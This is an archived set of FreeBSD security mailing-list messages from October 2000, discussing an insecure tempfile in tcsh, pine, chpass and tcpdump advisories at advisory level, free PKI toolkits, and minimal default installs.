the message From owner-freebsd-security Mon Oct 30 17: 1: 8 2000 Delivered-To: freebsd-security@freebsd.org Received: from bsdie.rwsystems.net (bsdie.rwsystems.net [209.197.223.2]) by hub.freebsd.org (Postfix) with ESMTP id 8BCE637B4C5; Mon, 30 Oct 2000 17:01:06 -0800 (PST) Received: from bsdie.rwsystems.net([209.197.223.2]) (1308 bytes) by bsdie.rwsystems.net via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp (sender: ) id for ; Mon, 30 Oct 2000 18:59:12 -0600 (CST) (Smail-3.2.0.111 2000-Feb-17 #1 built 2000-Jun-25) Date: Mon, 30 Oct 2000 18:59:12 -0600 (CST) From: James Wyatt To: Kris Kennaway Cc: Cy Schubert - ITSD Open Systems Group , freebsd-security@FreeBSD.ORG Subject: Re: tcsh: unsafe tempfile in << redirects (fwd) In-Reply-To: <20001030153129.A15198@citusc17.usc.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Content-ID: Content-Disposition: INLINE Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 30 Oct 2000, Kris Kennaway wrote: > On Mon, Oct 30, 2000 at 01:26:41PM -0800, Cy Schubert - ITSD Open Systems Group wrote: > > Our tcsh appears vulnerable. So is the 44bsd-csh port. > > Yep, stupid braindead $*&^*# shells... Was that comment *really* necessary? I use bash myself, but have enough users using tcsh (and ksh, etc) that I care about them too. Of course, some folks consider Emacs their shell... Most are just glad to have something besides command.com to work with. (^_^) Take care - Jy@ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 30 17:30:57 2000 Delivered-To: freebsd-security@freebsd.org Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id 37A8B37B479 for ; Mon, 30 Oct 2000 17:30:55 -0800 (PST) Received: (from kris@localhost) by citusc17.usc.edu (8.11.1/8.11.1) id e9V1Wwd15406; Mon, 30 Oct 2000 17:32:58 -0800 (PST) (envelope-from kris) Date: Mon, 30 Oct 2000 17:32:58 -0800 From: Kris Kennaway To: James Wyatt Cc: Cy Schubert - ITSD Open Systems Group , freebsd-security@FreeBSD.ORG Subject: Re: tcsh: unsafe tempfile in << redirects (fwd) Message-ID: <20001030173258.B15245@citusc17.usc.edu> References: <20001030153129.A15198@citusc17.usc.edu> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="ZfOjI3PrQbgiZnxM" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from jwyatt@rwsystems.net on Mon, Oct 30, 2000 at 06:59:12PM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --ZfOjI3PrQbgiZnxM Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Mon, Oct 30, 2000 at 06:59:12PM -0600, James Wyatt wrote: > On Mon, 30 Oct 2000, Kris Kennaway wrote: > > On Mon, Oct 30, 2000 at 01:26:41PM -0800, Cy Schubert - ITSD Open Syste= ms Group wrote: > > > Our tcsh appears vulnerable. So is the 44bsd-csh port. > >=20 > > Yep, stupid braindead $*&^*# shells... >=20 > Was that comment *really* necessary? I use bash myself, but have enough > users using tcsh (and ksh, etc) that I care about them too. Of course, > some folks consider Emacs their shell... Most are just glad to have > something besides command.com to work with. (^_^) I don't care about features of the shell, I care about braindead coding practises like thinking you don't have to worry that your filename is predictable and is created insecurely. Kris --ZfOjI3PrQbgiZnxM Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iEYEARECAAYFAjn+IUkACgkQWry0BWjoQKXV0wCfSkQOwkVGL7VxdvyvkwsWJyKB 4rUAoO2FRCoib0lE+VxCTJOXdIM7830r =lTWz -----END PGP SIGNATURE----- --ZfOjI3PrQbgiZnxM-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 30 17:37:44 2000 Delivered-To: freebsd-security@freebsd.org Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id 3F0D937B479; Mon, 30 Oct 2000 17:37:34 -0800 (PST) Received: (from kris@localhost) by citusc17.usc.edu (8.11.1/8.11.1) id e9V1dcg15480; Mon, 30 Oct 2000 17:39:38 -0800 (PST) (envelope-from kris) Date: Mon, 30 Oct 2000 17:39:37 -0800 From: Kris Kennaway To: Igor Roshchin Cc: security-officer@freebsd.org, security@freebsd.org Subject: Re: pine advisory Message-ID: <20001030173937.A15458@citusc17.usc.edu> References: <200010302329.SAA26744@giganda.komkon.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="IS0zKkzwUGydFO0o" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200010302329.SAA26744@giganda.komkon.org>; from str@giganda.komkon.org on Mon, Oct 30, 2000 at 06:29:19PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --IS0zKkzwUGydFO0o Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Mon, Oct 30, 2000 at 06:29:19PM -0500, Igor Roshchin wrote: >=20 > Hello! >=20 > ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/mail/pine-= 4.21_1.tgz is not present... =46rom the advisory: NOTE: It may be several days before updated packages are available. :-) Kris --IS0zKkzwUGydFO0o Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iEYEARECAAYFAjn+ItgACgkQWry0BWjoQKUw8wCcC4VPdQMSEX/a7iqInxGdPWSZ nqcAn1zo+jAsn5/RNv+d91OxQEBwq2to =isVj -----END PGP SIGNATURE----- --IS0zKkzwUGydFO0o-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 30 17:43: 5 2000 Delivered-To: freebsd-security@freebsd.org Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id 4C42437B4C5 for ; Mon, 30 Oct 2000 17:43:03 -0800 (PST) Received: (from kris@localhost) by citusc17.usc.edu (8.11.1/8.11.1) id e9V1j8I15537; Mon, 30 Oct 2000 17:45:08 -0800 (PST) (envelope-from kris) Date: Mon, 30 Oct 2000 17:45:08 -0800 From: Kris Kennaway To: Dima Dorfman Cc: freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-00:58.chpass Message-ID: <20001030174508.A15508@citusc17.usc.edu> References: <20001030231153.B618B37B4CF@hub.freebsd.org> <20001030235755.CB3A21F27@static.unixfreak.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="KsGdsel6WgEHnImy" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20001030235755.CB3A21F27@static.unixfreak.org>; from dima@unixfreak.org on Mon, Oct 30, 2000 at 03:57:55PM -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --KsGdsel6WgEHnImy Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Mon, Oct 30, 2000 at 03:57:55PM -0800, Dima Dorfman wrote: > [ PGP not available, raw data follows ] > > -----BEGIN PGP SIGNED MESSAGE----- > >=20 > > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D > > FreeBSD-SA-00:58 Security Adv= isory > > FreeBSD= , Inc. > >=20 > > Topic: chpass family contains local root vulnerability > >=20 > > Category: core > > Module: chfn/chpass/chsh/ypchfn/ypchpass/ypchsh/passwd >=20 > Forgive my ignorance, but I fail to see how 'passwd' is vulnerable. > Yes, it does link with the affected file (pw_util.c), and calls the > affected function (pw_error()), but, as far as I can tell, it never > calls it with any parameters which can be controlled by the user. Fair enough, I added this at the last minute to be sure without really checking. Better to have someone upgrade something that isn't actually a security risk than leave a vulnerable binary lying around. Kris --KsGdsel6WgEHnImy Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iEYEARECAAYFAjn+JCMACgkQWry0BWjoQKX5HgCg2SqDVj5lp9IWEh8MNHvVVkcI cJgAoM4BdlQ1Bpb4fgMHRtPP0iUi9CHQ =IyLj -----END PGP SIGNATURE----- --KsGdsel6WgEHnImy-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 30 17:50:58 2000 Delivered-To: freebsd-security@freebsd.org Received: from srv13-poa.poa.terra.com.br (srv13-poa.poa.zaz.com.br [200.248.149.91]) by hub.freebsd.org (Postfix) with ESMTP id DCC5537B4C5 for ; Mon, 30 Oct 2000 17:50:53 -0800 (PST) Received: from srv7-poa.poa.terra.com.br (srv7-poa.poa.terra.com.br [200.248.149.15]) by srv13-poa.poa.terra.com.br (8.9.3/8.9.3) with ESMTP id XAA24187; Mon, 30 Oct 2000 23:50:43 -0200 Received: from br.zoing.net (cm-net-C8B02AC8.poa.terra.com.br [200.176.42.200]) by srv7-poa.poa.terra.com.br (8.9.3/8.9.3) with ESMTP id XAA26072; Mon, 30 Oct 2000 23:50:43 -0200 Message-ID: X-Mailer: XFMail 1.4.0 on FreeBSD X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit MIME-Version: 1.0 In-Reply-To: <200010302329.SAA26744@giganda.komkon.org> Date: Mon, 30 Oct 2000 23:50:45 -0200 (EDT) Organization: http://www.showZ.com.br From: Antonio Carlos Venancio Junior To: Igor Roshchin Subject: RE: pine advisory Cc: security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Igor, I made on package for it. If you or anyone else wants, here it is: ---------- http://floripa.zoing.net/FreeBSD/pine-4.21_1.tgz ---------- This machine is FreeBSD 3.5-STABLE. On 30-Oct-00 Igor Roshchin wrote: > ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/mail/pine-4.21_ > 1.tgz is not present... Cya Antonio [ floripa@zoing.net | antonio@inf.ufsc.br ] [ ICQ# 9253680 | Floripa | MySQL | PHP | FreeBSD - The Power to Serve ] --- What this country needs is a good five cent microcomputer. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 30 19: 1: 9 2000 Delivered-To: freebsd-security@freebsd.org Received: from bsdie.rwsystems.net (bsdie.rwsystems.net [209.197.223.2]) by hub.freebsd.org (Postfix) with ESMTP id 7FD5937B4CF; Mon, 30 Oct 2000 19:01:07 -0800 (PST) Received: from bsdie.rwsystems.net([209.197.223.2]) (1998 bytes) by bsdie.rwsystems.net via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp (sender: ) id for ; Mon, 30 Oct 2000 20:59:33 -0600 (CST) (Smail-3.2.0.111 2000-Feb-17 #1 built 2000-Jun-25) Date: Mon, 30 Oct 2000 20:59:32 -0600 (CST) From: James Wyatt To: Kris Kennaway Cc: Cy Schubert - ITSD Open Systems Group , freebsd-security@FreeBSD.ORG Subject: Re: tcsh: unsafe tempfile in << redirects (fwd) In-Reply-To: <20001030173258.B15245@citusc17.usc.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Content-ID: Content-Disposition: INLINE Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 30 Oct 2000, Kris Kennaway wrote: > On Mon, Oct 30, 2000 at 06:59:12PM -0600, James Wyatt wrote: > > On Mon, 30 Oct 2000, Kris Kennaway wrote: > > > On Mon, Oct 30, 2000 at 01:26:41PM -0800, Cy Schubert - ITSD Open Systems Group wrote: > > > > Our tcsh appears vulnerable. So is the 44bsd-csh port. > > > > > > Yep, stupid braindead $*&^*# shells... > > > > Was that comment *really* necessary? I use bash myself, but have enough > > users using tcsh (and ksh, etc) that I care about them too. Of course, > > some folks consider Emacs their shell... Most are just glad to have > > something besides command.com to work with. (^_^) > > I don't care about features of the shell, I care about braindead > coding practises like thinking you don't have to worry that your > filename is predictable and is created insecurely. I can see your (and David G. Andersen's) point about this and agree. (Your answers to my response were much clearer than the original comment.) This also argues against allowing suid shell-scripts anywhere. Are there any shells that are audited for correctness or security? (does sh qualify?) Is using Perl for system scripts really more secure than shell scripts? - Jy@ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 30 20: 2:33 2000 Delivered-To: freebsd-security@freebsd.org Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id C7D5237B479 for ; Mon, 30 Oct 2000 20:02:29 -0800 (PST) Received: (from kris@localhost) by citusc17.usc.edu (8.11.1/8.11.1) id e9V44X016040; Mon, 30 Oct 2000 20:04:33 -0800 (PST) (envelope-from kris) Date: Mon, 30 Oct 2000 20:04:33 -0800 From: Kris Kennaway To: James Wyatt Cc: Cy Schubert - ITSD Open Systems Group , freebsd-security@FreeBSD.ORG Subject: Re: tcsh: unsafe tempfile in << redirects (fwd) Message-ID: <20001030200433.B16017@citusc17.usc.edu> References: <20001030173258.B15245@citusc17.usc.edu> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="eAbsdosE1cNLO4uF" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from jwyatt@rwsystems.net on Mon, Oct 30, 2000 at 08:59:32PM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --eAbsdosE1cNLO4uF Content-Type: text/plain; charset=us-ascii Content-Disposition: inline On Mon, Oct 30, 2000 at 08:59:32PM -0600, James Wyatt wrote: > I can see your (and David G. Andersen's) point about this and agree. (Your > answers to my response were much clearer than the original comment.) This > also argues against allowing suid shell-scripts anywhere. Are there any > shells that are audited for correctness or security? (does sh qualify?) Is > using Perl for system scripts really more secure than shell scripts? - Jy@ Perl at least tries to taint external input, etc. I don't know of any POSIX-like shells which have this feature. Kris --eAbsdosE1cNLO4uF Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iEUEARECAAYFAjn+RNAACgkQWry0BWjoQKXYYwCXdCpw8iMFfhhut3fjwca0ygTm FwCgjJuPc94tojzoxkhgAiSXZJ4OxQY= =/wyh -----END PGP SIGNATURE----- --eAbsdosE1cNLO4uF-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 30 21: 3:12 2000 Delivered-To: freebsd-security@freebsd.org Received: from lynx.aba.net.au (lynx.esec.com.au [203.21.84.1]) by hub.freebsd.org (Postfix) with SMTP id 8651E37B479 for ; Mon, 30 Oct 2000 21:03:09 -0800 (PST) Received: (qmail 23828 invoked from network); 31 Oct 2000 05:03:05 -0000 Received: from swun.esec.com.au (HELO eSec.com.au) (203.21.85.207) by lynx.esec.com.au with SMTP; 31 Oct 2000 05:03:05 -0000 Message-ID: <39FE5522.4E3B5A98@eSec.com.au> Date: Tue, 31 Oct 2000 16:14:10 +1100 From: Sam Wun Organization: eSec X-Mailer: Mozilla 4.74 [en] (X11; U; Linux 2.2.12 i386) X-Accept-Language: en MIME-Version: 1.0 Cc: freebsd-security@FreeBSD.ORG Subject: free pki for freeBSD? References: <20001030173258.B15245@citusc17.usc.edu> <20001030200433.B16017@citusc17.usc.edu> Content-Type: text/plain; charset=gb2312 Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, does anyone know whether there is a free package for PKI for freebsd? Thanks Smam To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 30 21: 9: 4 2000 Delivered-To: freebsd-security@freebsd.org Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id 0660537B4C5 for ; Mon, 30 Oct 2000 21:09:03 -0800 (PST) Received: (from kris@localhost) by citusc17.usc.edu (8.11.1/8.11.1) id e9V5B3e16163; Mon, 30 Oct 2000 21:11:03 -0800 (PST) (envelope-from kris) Date: Mon, 30 Oct 2000 21:11:03 -0800 From: Kris Kennaway To: Sam Wun Cc: freebsd-security@FreeBSD.ORG Subject: Re: free pki for freeBSD? Message-ID: <20001030211103.A16100@citusc17.usc.edu> References: <20001030173258.B15245@citusc17.usc.edu> <20001030200433.B16017@citusc17.usc.edu> <39FE5522.4E3B5A98@eSec.com.au> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="OgqxwSJOaUobr8KG" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <39FE5522.4E3B5A98@eSec.com.au>; from swun@eSec.com.au on Tue, Oct 31, 2000 at 04:14:10PM +1100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --OgqxwSJOaUobr8KG Content-Type: text/plain; charset=us-ascii Content-Disposition: inline On Tue, Oct 31, 2000 at 04:14:10PM +1100, Sam Wun wrote: > Hi, does anyone know whether there is a free package for PKI for freebsd? OpenSSL - included in the base system as of 4.0, or in ports. Kris --OgqxwSJOaUobr8KG Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iEYEARECAAYFAjn+VGYACgkQWry0BWjoQKW0sQCbBNeqvdXedHhUG3E0WGxBPlwT y94AoPlq6hmV7hoDuJKqIbh6L1FFeMg9 =5wv0 -----END PGP SIGNATURE----- --OgqxwSJOaUobr8KG-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 31 0:11:30 2000 Delivered-To: freebsd-security@freebsd.org Received: from orhi.sarenet.es (orhi.sarenet.es [192.148.167.5]) by hub.freebsd.org (Postfix) with ESMTP id 9ED2837B4F9; Tue, 31 Oct 2000 00:11:26 -0800 (PST) Received: from sarenet.es (sollube.sarenet.es [192.148.167.16]) by orhi.sarenet.es (Postfix) with SMTP id AC6F6D2776; Tue, 31 Oct 2000 09:09:04 +0000 (WET) Received: from sarenet.es ([192.148.167.77]) by sarenet.es ; Tue, 31 Oct 2000 09:11:01 +0100 Message-ID: <39FE7E95.60F46EB5@sarenet.es> Date: Tue, 31 Oct 2000 09:11:01 +0100 From: Borja Marcos X-Mailer: Mozilla 4.73 [en] (X11; I; Linux 2.2.12 i386) X-Accept-Language: en MIME-Version: 1.0 To: security-advisories@freebsd.org, security@freebsd.org Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-00:61.tcpdump References: <20001030231311.7642A37B680@hub.freebsd.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org FreeBSD Security Advisories wrote: > > Several overflowable buffers were discovered in the version of tcpdump > included in FreeBSD, during internal source code auditing. Some > simply allow the remote attacker to crash the local tcpdump process, > but there is a more serious vulnerability in the decoding of AFS ACL > packets in the more recent version of tcpdump (tcpdump 3.5) included > in FreeBSD 4.0-RELEASE, 4.1-RELEASE and 4.1.1-RELEASE, which may allow > a remote attacker to execute arbitrary code on the local system > (usually root, since root privileges are required to run tcpdump). Something I love in FreeBSD: You don't need to be root. Just need permissions to access /dev/bpf?. Perhaps you could recommend running it as an ordinary user? The same can be said of argus, snort and other IDSs. Borja. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 31 5:16:22 2000 Delivered-To: freebsd-security@freebsd.org Received: from mpd.ots.utexas.edu (mpd.ots.utexas.edu [128.83.223.50]) by hub.freebsd.org (Postfix) with SMTP id 9193137B479 for ; Tue, 31 Oct 2000 05:16:19 -0800 (PST) Received: (qmail 7022 invoked from network); 31 Oct 2000 13:20:11 -0000 Received: from unknown (HELO mpd.ots.utexas.edu) (128.83.223.50) by mpd.ots.utexas.edu with SMTP; 31 Oct 2000 13:20:11 -0000 Date: Tue, 31 Oct 2000 07:20:11 -0600 (CST) From: Gene Titus To: freebsd-security@FreeBSD.ORG Subject: Re: free pki for freeBSD? In-Reply-To: <20001030211103.A16100@citusc17.usc.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org OpenSSL is a tool kit for building your own PKI. Another toolkit is Oscar. Does anyone know of a shareware PKI system already built? Something with the CA and RA functions, works with a crypto box (ncipher, chryslis, or sureware keeper), hooks for smartcards.... that sort of thing. XCERT, CYLINK, Baltimore, netscape certificate server, all cost a ton of money. We have Pine, Perl, Apache..... Higher Ed. is in need of a shareware PKI product. CREN (at MIT I think) is an org willing to root higher Ed. No need to go to Verisign anymore. If enough people start using CREN as their root, netscape and IE will be forced (in other words, without being paid to do so) to add CREN to the list a trusted CA's. Gene Titus Sr. Operating System Specialist The Office of Telecommunication Services The University of Texas at austin On Mon, 30 Oct 2000, Kris Kennaway wrote: > On Tue, Oct 31, 2000 at 04:14:10PM +1100, Sam Wun wrote: > > Hi, does anyone know whether there is a free package for PKI for freebsd? > > OpenSSL - included in the base system as of 4.0, or in ports. > > Kris > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 31 5:25: 4 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.vxu.se (oxeln.vxu.se [194.47.65.30]) by hub.freebsd.org (Postfix) with ESMTP id BB66137B479 for ; Tue, 31 Oct 2000 05:24:58 -0800 (PST) Received: from XGod (aaldv97.idet.vxu.se [194.47.111.20]) by mail.vxu.se (Netscape Messaging Server 4.15) with SMTP id G3AQLK00.147 for ; Tue, 31 Oct 2000 14:24:56 +0100 Message-ID: <001501c0433d$fb8f1c20$6400a8c0@XGod> From: "Andreas Alderud" To: Subject: Installer Date: Tue, 31 Oct 2000 14:25:05 +0100 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org My only wish for FreeBSD 5.0-RELEASE is that it will be as small as possible, right now there are tons of stuff in 4.1 being installed that I don't need. For example, I don't see the reason why Sendmail is installed by default, many people need it, most people don't, those who do would be better off it was handled as a port. Some people would surtanly rather want PostFix being installed. I'm curious if I'm the only minimalist around here, personally I find it much simpler to secure and administrate a box if it just includes only the stuff that is absolutly needed. /Kind regards, David A. Alderud To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 31 5:30:45 2000 Delivered-To: freebsd-security@freebsd.org Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by hub.freebsd.org (Postfix) with ESMTP id 6F47637B4D7 for ; Tue, 31 Oct 2000 05:30:41 -0800 (PST) Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by mohegan.mohawk.net (8.9.3/8.9.3) with ESMTP id IAA53729; Tue, 31 Oct 2000 08:31:56 -0500 (EST) (envelope-from rjh@mohawk.net) Date: Tue, 31 Oct 2000 08:31:56 -0500 (EST) From: Ralph Huntington To: Andreas Alderud Cc: security@FreeBSD.ORG Subject: Re: Installer In-Reply-To: <001501c0433d$fb8f1c20$6400a8c0@XGod> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 31 Oct 2000, Andreas Alderud wrote: > I'm curious if I'm the only minimalist around here, personally I find it > much simpler to secure and administrate a box if it just includes only the > stuff that is absolutly needed. You might prefer a more minimilist BSD, e.g., OpenBSD. Personally, for the purposes I use FreeBSD, I like the default install. Usually I have to add things to it. For those purposes where a more minimal and more secure default install is desired, I use OpenBSD. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 31 5:41:25 2000 Delivered-To: freebsd-security@freebsd.org Received: from cactus.fi.uba.ar (cactus.fi.uba.ar [157.92.49.108]) by hub.freebsd.org (Postfix) with ESMTP id 48E1D37B479 for ; Tue, 31 Oct 2000 05:41:21 -0800 (PST) Received: from cactus.fi.uba.ar (cactus.fi.uba.ar [157.92.49.108]) by cactus.fi.uba.ar (8.9.3/8.9.3) with ESMTP id KAA19546; Tue, 31 Oct 2000 10:42:31 -0300 (ART) (envelope-from fgleiser@cactus.fi.uba.ar) Date: Tue, 31 Oct 2000 10:42:31 -0300 (ART) From: Fernando Gleiser To: Gene Titus Cc: freebsd-security@FreeBSD.ORG Subject: Re: free pki for freeBSD? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 31 Oct 2000, Gene Titus wrote: > > OpenSSL is a tool kit for building your own PKI. Another toolkit is Oscar. > Does anyone know of a shareware PKI system already built? Something > with the CA and RA functions, works with a crypto box > (ncipher, chryslis, or sureware keeper), hooks for smartcards.... that > sort of thing. You can try OpenCA (http://www.openca.org). I didn't have time to try it myself, but it seems good. You need OpenSSL, apache+mod_ssl and perl to run it. Fer To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 31 5:49:49 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.vxu.se (oxeln.vxu.se [194.47.65.30]) by hub.freebsd.org (Postfix) with ESMTP id D640237B4C5 for ; Tue, 31 Oct 2000 05:49:46 -0800 (PST) Received: from XGod (aaldv97.idet.vxu.se [194.47.111.20]) by mail.vxu.se (Netscape Messaging Server 4.15) with SMTP id G3ARQX00.14D for ; Tue, 31 Oct 2000 14:49:45 +0100 Message-ID: <004001c04341$72f10ff0$6400a8c0@XGod> From: "Andreas Alderud" To: References: Subject: Re: Installer Date: Tue, 31 Oct 2000 14:49:54 +0100 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Ralph Huntington wrote: > You might prefer a more minimilist BSD, e.g., OpenBSD. Personally, for the > purposes I use FreeBSD, I like the default install. Usually I have to add > things to it. For those purposes where a more minimal and more secure > default install is desired, I use OpenBSD. I like, and use, OpenBSD too. But it still isn't suited for most of the things I do, the lack of SMP support, for example, is more than just a little annoying. And it still isn't quite as minimalistic as I would like. /Kind regards, David A. Alderud To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 31 5:54: 2 2000 Delivered-To: freebsd-security@freebsd.org Received: from peitho.fxp.org (peitho.fxp.org [209.26.95.40]) by hub.freebsd.org (Postfix) with ESMTP id 3B19A37B4C5 for ; Tue, 31 Oct 2000 05:53:58 -0800 (PST) Received: by peitho.fxp.org (Postfix, from userid 1501) id A1B7E1360E; Tue, 31 Oct 2000 08:53:14 -0500 (EST) Date: Tue, 31 Oct 2000 08:53:14 -0500 From: Chris Faulhaber To: Andreas Alderud Cc: security@FreeBSD.ORG Subject: Re: Installer Message-ID: <20001031085314.A75919@peitho.fxp.org> References: <001501c0433d$fb8f1c20$6400a8c0@XGod> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <001501c0433d$fb8f1c20$6400a8c0@XGod>; from aaldv97@student.vxu.se on Tue, Oct 31, 2000 at 02:25:05PM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Oct 31, 2000 at 02:25:05PM +0100, Andreas Alderud wrote: > My only wish for FreeBSD 5.0-RELEASE is that it will be as small as > possible, right now there are tons of stuff in 4.1 being installed that I > don't need. > For example, I don't see the reason why Sendmail is installed by default, > many people need it, most people don't, those who do would be better off it 